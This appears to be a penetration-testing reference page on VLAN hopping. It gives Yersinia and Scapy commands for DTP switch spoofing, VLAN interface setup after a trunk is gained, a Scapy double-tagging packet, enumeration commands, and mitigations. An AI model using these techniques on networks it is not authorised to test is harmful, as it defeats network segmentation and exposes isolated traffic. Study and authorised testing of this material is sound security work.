> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# VLAN Hopping

> VLAN hopping attacks: DTP abuse, switch spoofing, double tagging, and VLAN enumeration.

## Overview

VLAN hopping allows attacker to access traffic on other VLANs without routing. Two main techniques: switch spoofing (DTP) and double tagging.

***

## Switch Spoofing (DTP Abuse)

Negotiate trunk port with switch via DTP.

### Yersinia

```bash theme={"dark"}
yersinia dtp -attack 1 -interface eth0
```

### Manual with Scapy

```python theme={"dark"}
from scapy.all import *
from scapy.contrib.dtp import *

negotiate_trunk(iface="eth0")
```

### After Trunk Established

```bash theme={"dark"}
# Create VLAN interface
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN up
dhclient eth0.TARGET_VLAN
```

Or manually:

```bash theme={"dark"}
ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 10.10.100.10/24 dev eth0.100
ip link set eth0.100 up
```

Now can reach hosts on VLAN 100.

***

## Double Tagging

Encapsulate frame in two 802.1Q tags. Outer tag matches native VLAN, inner tag is target VLAN.

<Warning>One-way only — no return traffic. Useful for blind attacks (e.g., injecting into target VLAN).</Warning>

### Scapy

```python theme={"dark"}
from scapy.all import *

packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(packet, iface="eth0")
```

### Requirements

* Attacker on native VLAN (untagged)
* Switch doesn't strip outer tag before forwarding
* Target VLAN known

***

## VLAN Enumeration

### Wireshark

```
vlan
```

Look for 802.1Q tagged frames to identify VLANs.

### Nmap

```bash theme={"dark"}
nmap --script=broadcast-listener -e eth0
```

### CDP/LLDP

```bash theme={"dark"}
tcpdump -i eth0 -nn -v 'ether proto 0x88cc'        # LLDP sniff
tcpdump -i eth0 -nn -v 'ether dst 01:00:0c:cc:cc:cc' # CDP sniff
yersinia cdp -attack 0 -interface eth0             # SEND a CDP packet (not a sniff)
```

***

## Mitigation

| Defense      | Description                           |
| ------------ | ------------------------------------- |
| Disable DTP  | `switchport nonegotiate`              |
| Access mode  | `switchport mode access` on all ports |
| Native VLAN  | Change from VLAN 1 to unused VLAN     |
| VLAN pruning | Only allow needed VLANs on trunks     |

***

## Quick Reference

| Attack      | Method                                            |
| ----------- | ------------------------------------------------- |
| DTP abuse   | `yersinia dtp -attack 1` → negotiate trunk        |
| Access VLAN | `vconfig add eth0 VLAN_ID` after trunk            |
| Double tag  | Scapy: Dot1Q(native)/Dot1Q(target) — one-way only |
| Enumerate   | Wireshark `vlan` filter, CDP/LLDP sniff           |
